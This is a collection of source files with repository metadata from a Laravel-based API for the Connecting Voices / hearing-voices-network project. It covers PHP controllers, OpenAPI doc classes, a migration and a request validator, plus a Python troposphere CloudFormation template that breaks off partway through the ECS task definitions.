to the API, and the admin web app once you've \nset it up.\n\n## Running the tests\n\nTo run the test suite you can use the following commands:\n\n```bash\n# To run both style and unit tests.\ncomposer test\n\n# To run only style tests.\ncomposer test:style\n\n# To run only unit tests.\ncomposer test:unit\n```\n\nIf you receive any errors from the style tests, you can automatically fix most, \nif not all of the issues with the following command:\n\n```bash\ncomposer fix:style\n```\n\n## Deployment\n\nDeployment is all automated through Travis CI. Pushes to the `develop` branch \nwill automatically deploy to staging, whereas pushes to `master` will \nautomatically deploy to production.\n\nIt is important to tag any releases to production using [SemVer](http://semver.org/).\n\n## Built with\n\n* [Laravel 5.8](https://laravel.com/docs/5.8) - The PHP framework used\n\n## Contributing\n\nPlease read [CONTRIBUTING.md](CONTRIBUTING.md) for details on our code of \nconduct, and the process for submitting pull requests to us.\n\n## Versioning\n\nWe use [SemVer](http://semver.org/) for versioning. For the versions available, \nsee the [tags on this repository](https://github.com/hearing-voices-network/api/tags). \n\n## Authors\n\n* [Ayup Digital](https://ayup.agency)\n\nSee also the list of [contributors](https://github.com/hearing-voices-network/api/contributors) \nwho participated in this project.\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE.md](LICENSE.md) \nfile for details.\n"
},
{
"alpha_fraction": 0.6152157783508301,
"alphanum_fraction": 0.6159473061561584,
"avg_line_length": 34.0512809753418,
"blob_id": "f5a2b8a8de1ddd5626a4501588a663120e9fda76",
"content_id": "8847fcce9a4a14e37aad153bcd01cd661519b166",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1367,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 39,
"path": "/app/Docs/Paths/Files/FilesDownloadPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Files;\n\nuse App\\Docs\\Operations\\Files\\DownloadFileOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass FilesDownloadPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/files/{file}/download')\n ->parameters(\n Parameter::path()\n ->name('file')\n ->description('The ID of the file')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required(),\n Parameter::query()\n ->name('token')\n ->description('The single use token needed to download private files')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n )\n ->operations(\n DownloadFileOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6871609687805176,
"alphanum_fraction": 0.6880651116371155,
"avg_line_length": 30.600000381469727,
"blob_id": "454b7a0fac723df1b8e8159d5cf06cbd469eacb6",
"content_id": "2f0268d73d507a840a7ab65542918424db1db120",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1106,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 35,
"path": "/app/Docs/Operations/Contributions/DestroyContributionOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Contributions;\n\nuse App\\Docs\\Responses\\ResourceDeletedResponse;\nuse App\\Docs\\Tags\\ContributionsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\n\nclass DestroyContributionOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_DELETE)\n ->summary('Delete a specific contribution')\n ->description(\n Utils::operationDescription([Admin::class, EndUser::class])\n )\n ->tags(ContributionsTag::create())\n ->responses(\n ResourceDeletedResponse::create(null, 'contribution')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.646792471408844,
"alphanum_fraction": 0.64754718542099,
"avg_line_length": 31.317073822021484,
"blob_id": "913f8bc85eb90e89529d5a0897148fced39e597c",
"content_id": "26eb84172621addb340ec66824532085627306cf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1325,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 41,
"path": "/app/Docs/Operations/Tags/DestroyTagOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Tags;\n\nuse App\\Docs\\Responses\\ResourceDeletedResponse;\nuse App\\Docs\\Tags\\TagsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass DestroyTagOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_DELETE)\n ->summary('Delete a specific tag')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(TagsTag::create())\n ->parameters(\n Parameter::query()->name('type')->required()->schema(\n Schema::string()->enum('soft_delete', 'force_delete')\n )\n )\n ->responses(\n ResourceDeletedResponse::create(null, 'tag')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.551196813583374,
"alphanum_fraction": 0.5598404407501221,
"avg_line_length": 32.42222213745117,
"blob_id": "f2311b9cc0ffc0ef5e7dd7d4e5918cd426ad0225",
"content_id": "7b56331b1f6a23070171c5a859bc155e5445f075",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1504,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 45,
"path": "/app/Http/Resources/ContributionResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\Contribution $resource\n */\nclass ContributionResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n $isAdmin = optional($request->user('api'))->isAdmin();\n $isAuthor = optional($request->user('api'))->isEndUser()\n && $this->resource->belongsToEndUser($request->user('api')->endUser);\n\n return [\n 'id' => $this->resource->id,\n 'end_user_id' => $this->when($isAdmin || $isAuthor, $this->resource->end_user_id),\n 'content' => $this->resource->content,\n 'excerpt' => $this->resource->getExcerpt(),\n 'status' => $this->resource->status,\n 'changes_requested' => $this->when(\n $isAdmin || $isAuthor,\n $this->resource->changes_requested\n ),\n 'status_last_updated_at' => $this->when(\n $isAdmin || $isAuthor,\n $this->resource->status_last_updated_at->toIso8601String()\n ),\n 'created_at' => $this->resource->created_at->toIso8601String(),\n 'updated_at' => $this->resource->updated_at->toIso8601String(),\n 'tags' => TagResource::collection($this->resource->tags),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5152625441551208,
"alphanum_fraction": 0.5311355590820312,
"avg_line_length": 23.81818199157715,
"blob_id": "2f653356e2016e03f4771edef9a822ea5f04edd6",
"content_id": "92d9e185ca7c5fd87037f020baa2501a21773f61",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 819,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 33,
"path": "/app/Http/Requests/Admin/UpdateAdminRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Admin;\n\nuse App\\Rules\\Password;\nuse App\\Rules\\UkPhoneNumber;\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass UpdateAdminRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'name' => ['bail', 'string', 'max:255'],\n 'phone' => ['bail', 'string', 'max:255', new UkPhoneNumber()],\n 'email' => [\n 'bail',\n 'email',\n 'max:255',\n Rule::unique('users')->ignore($this->admin->user_id),\n ],\n 'password' => ['bail', 'string', 'max:255', new Password()],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5641025900840759,
"alphanum_fraction": 0.5667550563812256,
"avg_line_length": 28.763158798217773,
"blob_id": "3cd2cb95580d62b453992ded4734d37b3829222b",
"content_id": "55c408587734350dda46292059c46cfdab9e0d29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1131,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 38,
"path": "/database/migrations/2019_05_29_101747_create_audits_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateAuditsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('audits', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('user_id')->nullable();\n $table->foreign('user_id')->references('id')->on('users');\n $table->unsignedInteger('client_id')->nullable();\n $table->foreign('client_id')->references('id')->on('oauth_clients');\n $table->string('action');\n $table->foreign('action')->references('action')->on('audit_actions');\n $table->text('description');\n $table->string('ip_address', 45);\n $table->text('user_agent')->nullable();\n $table->timestamp('created_at')->useCurrent();\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('audits');\n }\n}\n"
},
{
"alpha_fraction": 0.6368810534477234,
"alphanum_fraction": 0.6374502182006836,
"avg_line_length": 29.824562072753906,
"blob_id": "f9c40c31fe5bfc1816776bdbe692d8d56004d71a",
"content_id": "2ce335e20bd631df3ba936222d988144a53a5ca3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3514,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 114,
"path": "/app/Http/Controllers/V1/TagController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Requests\\Tag\\DestroyTagRequest;\nuse App\\Http\\Requests\\Tag\\StoreTagRequest;\nuse App\\Http\\Resources\\TagResource;\nuse App\\Http\\Responses\\ResourceDeletedResponse;\nuse App\\Models\\Tag;\nuse App\\Services\\TagService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\QueryBuilder;\n\nclass TagController extends ApiController\n{\n /**\n * @var \\App\\Services\\TagService\n */\n protected $tagService;\n\n /**\n * TagController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\TagService $tagService\n */\n public function __construct(Request $request, Pagination $pagination, TagService $tagService)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified'])->except('index', 'show');\n $this->authorizeResource(Tag::class);\n\n $this->tagService = $tagService;\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(Request $request): ResourceCollection\n {\n $baseQuery = Tag::query()\n ->withCount('publicContributions');\n\n $tags = QueryBuilder::for($baseQuery)\n ->allowedSorts([\n 'name',\n ])\n ->defaultSort('name')\n ->get();\n\n event(EndpointInvoked::onRead($request, 'Viewed all tags.'));\n\n return TagResource::collection($tags);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Tag\\StoreTagRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function store(StoreTagRequest $request): JsonResource\n {\n $tag = $this->tagService->create([\n 'parent_tag_id' => $request->parent_tag_id,\n 'name' => $request->name,\n ]);\n\n event(EndpointInvoked::onCreate($request, \"Created tag [{$tag->id}].\"));\n\n return new TagResource($tag);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Tag $tag\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Tag $tag): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed tag [{$tag->id}].\"));\n\n return new TagResource($tag);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Tag\\DestroyTagRequest $request\n * @param \\App\\Models\\Tag $tag\n * @return \\App\\Http\\Responses\\ResourceDeletedResponse\n */\n public function destroy(DestroyTagRequest $request, Tag $tag): ResourceDeletedResponse\n {\n DB::transaction(function () use ($request, $tag): void {\n $request->type === DestroyTagRequest::TYPE_FORCE_DELETE\n ? $this->tagService->forceDelete($tag)\n : $this->tagService->softDelete($tag);\n });\n\n $request->type === DestroyTagRequest::TYPE_FORCE_DELETE\n ? event(EndpointInvoked::onDelete($request, \"Force deleted tag [{$tag->id}].\"))\n : event(EndpointInvoked::onDelete($request, \"Soft deleted tag [{$tag->id}].\"));\n\n return new ResourceDeletedResponse('tag');\n }\n}\n"
},
{
"alpha_fraction": 0.7129629850387573,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 9.800000190734863,
"blob_id": "8b906ef66bd1f0f8438b05445b4c12c04072fd69",
"content_id": "bda5d4e855046e832fe78ac14233c9f8cc56b449",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 108,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 10,
"path": "/app/Models/Relationships/CountryRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\ntrait CountryRelationships\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6020638942718506,
"alphanum_fraction": 0.6135741472244263,
"avg_line_length": 26.062297821044922,
"blob_id": "8596622010dc32e701f3dfee5a4b8f091637e5eb",
"content_id": "fd52376b4333c8b239c3070085fa34361cf7dcba",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25195,
"license_type": "permissive",
"max_line_length": 245,
"num_lines": 931,
"path": "/aws/cloudformation.py",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# ==================================================\n# This stack creates the API infrastructure.\n# ==================================================\nfrom troposphere import Template, Parameter, Ref, GetAtt, Join, Base64, Output, Sub\nimport troposphere.ec2 as ec2\nimport troposphere.rds as rds\nimport troposphere.elasticache as elasticache\nimport troposphere.sqs as sqs\nimport troposphere.s3 as s3\nimport troposphere.iam as iam\nimport troposphere.ecs as ecs\nimport troposphere.ecr as ecr\nimport troposphere.logs as logs\nimport troposphere.elasticloadbalancingv2 as elb\nimport troposphere.autoscaling as autoscaling\nimport uuid\n\n# ==================================================\n# Template details.\n# ==================================================\ntemplate = Template('Create the infrastructure needed to run the Connecting Voices API')\ntemplate.set_version('2010-09-09')\n\n# ==================================================\n# Parameters.\n# ==================================================\nuuid_parameter = template.add_parameter(\n Parameter(\n 'Uuid',\n Type='String',\n Default=str(uuid.uuid4()),\n Description='The unique ID for this stack.',\n MinLength='36',\n MaxLength='36'\n )\n)\n\nenvironment_parameter = template.add_parameter(\n Parameter(\n 'Environment',\n Type='String',\n Description='The environment this stack is for (e.g. production or staging).',\n MinLength='1'\n )\n)\n\ncertificate_arn_parameter = template.add_parameter(\n Parameter(\n 'CertificateArn',\n Type='String',\n Description='The ARN for the API load balancer SSL certificate.'\n )\n)\n\nvpc_parameter = template.add_parameter(\n Parameter(\n 'Vpc',\n Type='AWS::EC2::VPC::Id',\n Description='The Virtual Private Cloud (VPC) to launch the stack in.'\n )\n)\n\nsubnets_parameter = template.add_parameter(\n Parameter(\n 'Subnets',\n Type='List<AWS::EC2::Subnet::Id>',\n Description='The list of subnet IDs, for at least two Availability Zones in the region in your Virtual Private Cloud (VPC).'\n )\n)\n\ndatabase_password_parameter = template.add_parameter(\n Parameter(\n 'DatabasePassword',\n Description='The database admin password.',\n NoEcho=True,\n Type='String',\n MinLength='8',\n MaxLength='41',\n AllowedPattern='[a-zA-Z0-9]*',\n ConstraintDescription='Must only contain alphanumeric characters.'\n )\n)\n\ndatabase_class_parameter = template.add_parameter(\n Parameter(\n 'DatabaseClass',\n Description='The database instance class.',\n Type='String',\n Default='db.t3.micro',\n AllowedValues=[\n 'db.t3.micro',\n 'db.t3.small',\n 'db.t3.medium',\n 'db.t3.large',\n 'db.t3.xlarge',\n 'db.t3.2xlarge'\n ],\n ConstraintDescription='Must select a valid database instance type.'\n )\n)\n\ndatabase_allocated_storage_parameter = template.add_parameter(\n Parameter(\n 'DatabaseAllocatedStorage',\n Description='The size of the database (GiB).',\n Default='10',\n Type='Number',\n MinValue='5',\n MaxValue='1024',\n ConstraintDescription='Must be between 5 and 1024 GiB.'\n )\n)\n\nredis_node_class_parameter = template.add_parameter(\n Parameter(\n 'RedisNodeClass',\n Description='The Redis node class.',\n Type='String',\n Default='cache.t2.micro',\n AllowedValues=[\n 'cache.t2.micro',\n 'cache.t2.small',\n 'cache.t2.medium'\n ],\n ConstraintDescription='Must select a valid Redis node type.'\n )\n)\n\nredis_nodes_count_parameter = template.add_parameter(\n Parameter(\n 'RedisNodesCount',\n Description='The number of Redis nodes to have in the cluster.',\n Default='1',\n Type='Number',\n MinValue='1',\n ConstraintDescription='Must be 1 or more.'\n )\n)\n\napi_instance_class_parameter = template.add_parameter(\n Parameter(\n 'ApiInstanceClass',\n Description='The API EC2 instance class.',\n Type='String',\n Default='t3.micro',\n AllowedValues=[\n 't3.nano',\n 't3.micro',\n 't3.small',\n 't3.medium',\n 't3.large',\n 't3.xlarge',\n 't3.2xlarge'\n ],\n ConstraintDescription='Must select a valid API instance type.'\n )\n)\n\napi_instance_count_parameter = template.add_parameter(\n Parameter(\n 'ApiInstanceCount',\n Description='The number of API EC2 instances to load balance between.',\n Type='Number',\n Default='2',\n MinValue='1',\n ConstraintDescription='Must be 1 or more.'\n )\n)\n\napi_task_count_parameter = template.add_parameter(\n Parameter(\n 'ApiTaskCount',\n Description='The number of API containers to run.',\n Type='Number',\n Default='0',\n MinValue='0',\n ConstraintDescription='Must be 0 or more.'\n )\n)\n\nscheduler_task_count_parameter = template.add_parameter(\n Parameter(\n 'SchedulerTaskCount',\n Description='The number of scheduler containers to run.',\n Type='Number',\n Default='0',\n MinValue='0',\n MaxValue='1',\n ConstraintDescription='Must be either 0 or 1.'\n )\n)\n\nqueue_worker_task_count_parameter = template.add_parameter(\n Parameter(\n 'QueueWorkerTaskCount',\n Description='The number of queue worker containers to run.',\n Type='Number',\n Default='0',\n MinValue='0',\n ConstraintDescription='Must be 0 or more.'\n )\n)\n\n# ==================================================\n# Variables.\n# ==================================================\ndefault_queue_name_variable = Join('-', ['default', Ref(environment_parameter), Ref(uuid_parameter)])\nuploads_bucket_name_variable = Join('-', ['uploads', Ref(environment_parameter), Ref(uuid_parameter)])\napi_launch_template_name_variable = Join('-', ['api-launch-template', Ref(environment_parameter)])\ndocker_repository_name_variable = Join('-', ['api', Ref(environment_parameter), Ref(uuid_parameter)])\napi_log_group_name_variable = Join('-', ['api', Ref(environment_parameter)])\nqueue_worker_log_group_name_variable = Join('-', ['queue-worker', Ref(environment_parameter)])\nscheduler_log_group_name_variable = Join('-', ['scheduler', Ref(environment_parameter)])\napi_task_definition_family_variable = Join('-', ['api', Ref(environment_parameter)])\nqueue_worker_task_definition_family_variable = Join('-', ['queue-worker', Ref(environment_parameter)])\nscheduler_task_definition_family_variable = Join('-', ['scheduler', Ref(environment_parameter)])\napi_user_name_variable = Join('-', ['api', Ref(environment_parameter)])\nci_user_name_variable = Join('-', ['ci', Ref(environment_parameter)])\ndatabase_name_variable = 'connecting_voices'\ndatabase_username_variable = 'connecting_voices'\n\n# ==================================================\n# Resources.\n# ==================================================\nload_balancer_security_group_resource = template.add_resource(\n ec2.SecurityGroup(\n 'LoadBalancerSecurityGroup',\n GroupDescription='For connecting to the API load balancer',\n SecurityGroupIngress=[\n ec2.SecurityGroupRule(\n Description='HTTP access from the public',\n IpProtocol='tcp',\n FromPort='80',\n ToPort='80',\n CidrIp='0.0.0.0/0'\n ),\n ec2.SecurityGroupRule(\n Description='HTTPS access from the public',\n IpProtocol='tcp',\n FromPort='443',\n ToPort='443',\n CidrIp='0.0.0.0/0'\n )\n ]\n )\n)\n\napi_security_group_resource = template.add_resource(\n ec2.SecurityGroup(\n 'ApiSecurityGroup',\n GroupDescription='For connecting to the API containers',\n SecurityGroupIngress=[\n ec2.SecurityGroupRule(\n Description='Full access from the load balancer',\n IpProtocol='tcp',\n FromPort='0',\n ToPort='65535',\n SourceSecurityGroupName=Ref(load_balancer_security_group_resource)\n )\n ]\n )\n)\n\ndatabase_security_group_resource = template.add_resource(\n ec2.SecurityGroup(\n 'DatabaseSecurityGroup',\n GroupDescription='For connecting to the MySQL instance',\n SecurityGroupIngress=[\n ec2.SecurityGroupRule(\n Description='MySQL access from the API containers',\n IpProtocol='tcp',\n FromPort='3306',\n ToPort='3306',\n SourceSecurityGroupName=Ref(api_security_group_resource)\n )\n ]\n )\n)\n\nredis_security_group_resource = template.add_resource(\n ec2.SecurityGroup(\n 'RedisSecurityGroup',\n GroupDescription='For connecting to the Redis cluster',\n SecurityGroupIngress=[\n ec2.SecurityGroupRule(\n Description='Redis access from the API containers',\n IpProtocol='tcp',\n FromPort='6379',\n ToPort='6379',\n SourceSecurityGroupName=Ref(api_security_group_resource)\n )\n ]\n )\n)\n\ndatabase_subnet_group_resource = template.add_resource(\n rds.DBSubnetGroup(\n 'DatabaseSubnetGroup',\n DBSubnetGroupDescription='Subnets available for the RDS instance',\n SubnetIds=Ref(subnets_parameter)\n )\n)\n\ndatabase_resource = template.add_resource(\n rds.DBInstance(\n 'Database',\n DBName=database_name_variable,\n AllocatedStorage=Ref(database_allocated_storage_parameter),\n DBInstanceClass=Ref(database_class_parameter),\n Engine='MySQL',\n EngineVersion='5.7',\n MasterUsername=database_username_variable,\n MasterUserPassword=Ref(database_password_parameter),\n VPCSecurityGroups=[GetAtt(database_security_group_resource, 'GroupId')],\n DBSubnetGroupName=Ref(database_subnet_group_resource),\n PubliclyAccessible=False\n )\n)\n\nredis_subnet_group_resource = template.add_resource(\n elasticache.SubnetGroup(\n 'RedisSubnetGroup',\n Description='Subnets available for the Redis cluster',\n SubnetIds=Ref(subnets_parameter)\n )\n)\n\nredis_resource = template.add_resource(\n elasticache.CacheCluster(\n 'Redis',\n Engine='redis',\n EngineVersion='4.0',\n CacheNodeType=Ref(redis_node_class_parameter),\n NumCacheNodes=Ref(redis_nodes_count_parameter),\n VpcSecurityGroupIds=[GetAtt(redis_security_group_resource, 'GroupId')],\n CacheSubnetGroupName=Ref(redis_subnet_group_resource)\n )\n)\n\ndefault_queue_resource = template.add_resource(\n sqs.Queue(\n 'DefaultQueue',\n QueueName=default_queue_name_variable\n )\n)\n\nuploads_bucket_resource = template.add_resource(\n s3.Bucket(\n 'UploadsBucket',\n BucketName=uploads_bucket_name_variable,\n AccessControl='Private'\n )\n)\n\necs_cluster_role_resource = template.add_resource(\n iam.Role(\n 'ECSClusterRole',\n ManagedPolicyArns=['arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role'],\n AssumeRolePolicyDocument={\n 'Version': '2012-10-17',\n 'Statement': [\n {\n 'Action': 'sts:AssumeRole',\n 'Principal': {\n 'Service': 'ec2.amazonaws.com'\n },\n 'Effect': 'Allow'\n }\n ]\n }\n )\n)\n\nec2_instance_profile_resource = template.add_resource(\n iam.InstanceProfile(\n 'EC2InstanceProfile',\n Roles=[Ref(ecs_cluster_role_resource)]\n )\n)\n\necs_cluster_resource = template.add_resource(\n ecs.Cluster(\n 'ApiCluster'\n )\n)\n\nlaunch_template_resource = template.add_resource(\n ec2.LaunchTemplate(\n 'LaunchTemplate',\n LaunchTemplateName=api_launch_template_name_variable,\n LaunchTemplateData=ec2.LaunchTemplateData(\n ImageId='ami-0ae254c8a2d3346a7',\n InstanceType=Ref(api_instance_class_parameter),\n IamInstanceProfile=ec2.IamInstanceProfile(\n Arn=GetAtt(ec2_instance_profile_resource, 'Arn')\n ),\n InstanceInitiatedShutdownBehavior='terminate',\n Monitoring=ec2.Monitoring(Enabled=True),\n SecurityGroups=[Ref(api_security_group_resource)],\n BlockDeviceMappings=[\n ec2.BlockDeviceMapping(\n DeviceName='/dev/xvdcz',\n Ebs=ec2.EBSBlockDevice(\n DeleteOnTermination=True,\n VolumeSize=22,\n VolumeType='gp2'\n )\n )\n ],\n UserData=Base64(\n Join('', [\n '#!/bin/bash\\n',\n 'echo ECS_CLUSTER=',\n Ref(ecs_cluster_resource),\n ' >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;'\n ])\n )\n )\n )\n)\n\ndocker_repository_resource = template.add_resource(\n ecr.Repository(\n 'DockerRepository',\n RepositoryName=docker_repository_name_variable,\n LifecyclePolicy=ecr.LifecyclePolicy(\n LifecyclePolicyText='{\"rules\":[{\"rulePriority\":1,\"description\":\"Remove untagged images older than 1 week\",\"selection\":{\"tagStatus\":\"untagged\",\"countType\":\"sinceImagePushed\",\"countUnit\":\"days\",\"countNumber\":7},\"action\":{\"type\":\"expire\"}}]}'\n )\n )\n)\n\napi_log_group_resource = template.add_resource(\n logs.LogGroup(\n 'ApiLogGroup',\n LogGroupName=api_log_group_name_variable,\n RetentionInDays=7\n )\n)\n\nqueue_worker_log_group_resource = template.add_resource(\n logs.LogGroup(\n 'QueueWorkerLogGroup',\n LogGroupName=queue_worker_log_group_name_variable,\n RetentionInDays=7\n )\n)\n\nscheduler_log_group_resource = template.add_resource(\n logs.LogGroup(\n 'SchedulerLogGroup',\n LogGroupName=scheduler_log_group_name_variable,\n RetentionInDays=7\n )\n)\n\napi_task_definition_resource = template.add_resource(\n ecs.TaskDefinition(\n 'ApiTaskDefinition',\n Family=api_task_definition_family_variable,\n NetworkMode='bridge',\n RequiresCompatibilities=['EC2'],\n ContainerDefinitions=[ecs.ContainerDefinition(\n Name='api',\n Image=Join('.', [\n Ref('AWS::AccountId'),\n 'dkr.ecr',\n Ref('AWS::Region'),\n Join('/', [\n 'amazonaws.com',\n Ref(docker_repository_resource)\n ])\n ]),\n MemoryReservation='256',\n PortMappings=[ecs.PortMapping(\n HostPort='0',\n ContainerPort='80',\n Protocol='tcp'\n )],\n Essential=True,\n LogConfiguration=ecs.LogConfiguration(\n LogDriver='awslogs',\n Options={\n 'awslogs-group': Ref(api_log_group_resource),\n 'awslogs-region': Ref('AWS::Region'),\n 'awslogs-stream-prefix': 'ecs'\n }\n )\n )]\n )\n)\n\nqueue_worker_task_definition_resource = template.add_resource(\n ecs.TaskDefinition(\n 'QueueWorkerTaskDefinition',\n Family=queue_worker_task_definition_family_variable,\n NetworkMode='bridge',\n RequiresCompatibilities=['EC2'],\n ContainerDefinitions=[ecs.ContainerDefinition(\n Name='api',\n Image=Join('.', [\n Ref('AWS::AccountId'),\n 'dkr.ecr',\n Ref('AWS::Region'),\n Join('/', [\n 'amazonaws.com',\n Ref(docker_repository_resource)\n ])\n ]),\n MemoryReservation='256',\n Essential=True,\n LogConfiguration=ecs.LogConfiguration(\n LogDriver='awslogs',\n Options={\n 'awslogs-group': Ref(queue_worker_log_group_resource),\n 'awslogs-region': Ref('AWS::Region'),\n 'awslogs-stream-prefix': 'ecs'\n }\n ),\n Command=[\n 'php',\n 'artisan',\n 'queue:work',\n '--tries=1'\n ],\n WorkingDirectory='/var/www/html',\n HealthCheck=ecs.HealthCheck(\n Command=[\n 'CMD-SHELL',\n 'php -v || exit 1'\n ],\n Interval=30,\n Retries=3,\n Timeout=5\n )\n )]\n )\n)\n\nscheduler_task_definition_resource = template.add_resource(\n ecs.TaskDefinition(\n 'SchedulerTaskDefinition',\n Family=scheduler_task_definition_family_variable,\n NetworkMode='bridge',\n RequiresCompatibilities=['EC2'],\n ContainerDefinitions=[ecs.ContainerDefinition(\n Name='api',\n Image=Join('.', [\n Ref('AWS::AccountId'),\n 'dkr.ecr',\n Ref('AWS::Region'),\n Join('/', [\n 'amazonaws.com',\n 